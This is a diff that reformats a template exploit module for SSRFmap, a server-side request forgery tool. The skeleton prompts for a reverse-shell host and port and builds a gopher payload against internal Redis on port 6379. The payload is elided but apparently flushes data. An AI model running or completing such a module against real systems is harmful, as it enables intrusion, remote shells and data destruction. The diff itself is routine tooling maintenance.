@@ -1,12 +1,14 @@
-from ssrfmap.core.utils import *
 import logging
 
-name          = "servicename in lowercase"
-description   = "ServiceName RCE - What does it do"
-author        = "Name or pseudo of the author"
-documentation = ["http://link_to_a_research", "http://another_link"]
+from ssrfmap.core.utils import gen_ip_list, wrapper_gopher
 
-class exploit():
+name = "servicename in lowercase"
+description = "ServiceName RCE - What does it do"
+author = "Name or pseudo of the author"
+documentation: list[str] = ["http://link_to_a_research", "http://another_link"]
+
+
+class exploit:
     SERVER_HOST = "127.0.0.1"
     SERVER_PORT = "4242"
 
@@ -14,11 +16,15 @@ class exploit():
         logging.info("Module '{}' launched !".format(name))
 
         # Handle args for reverse shell
-        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
-        else:                  self.SERVER_HOST = args.lhost
+        if args.lhost == None:
+            self.SERVER_HOST = input("Server Host:")
+        else:
+            self.SERVER_HOST = args.lhost
 
-        if args.lport == None: self.SERVER_PORT = input("Server Port:")
-        else:                  self.SERVER_PORT = args.lport
+        if args.lport == None:
+            self.SERVER_PORT = input("Server Port:")
+        else:
+            self.SERVER_PORT = args.lport
 
         # Using a generator to create the host list
         gen_host = gen_ip_list("127.0.0.1", args.level)
@@ -27,11 +33,11 @@ class exploit():
             # Data and port for the service
             port = "6379"
             data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
-            payload = wrapper_gopher(data, ip , port)
+            payload = wrapper_gopher(data, ip, port)
 
             # Handle args for reverse shell
             payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
             payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
 
             # Send the payload
-            r = requester.do_request(args.param, payload)
\ No newline at end of file
+            r = requester.do_request(args.param, payload)
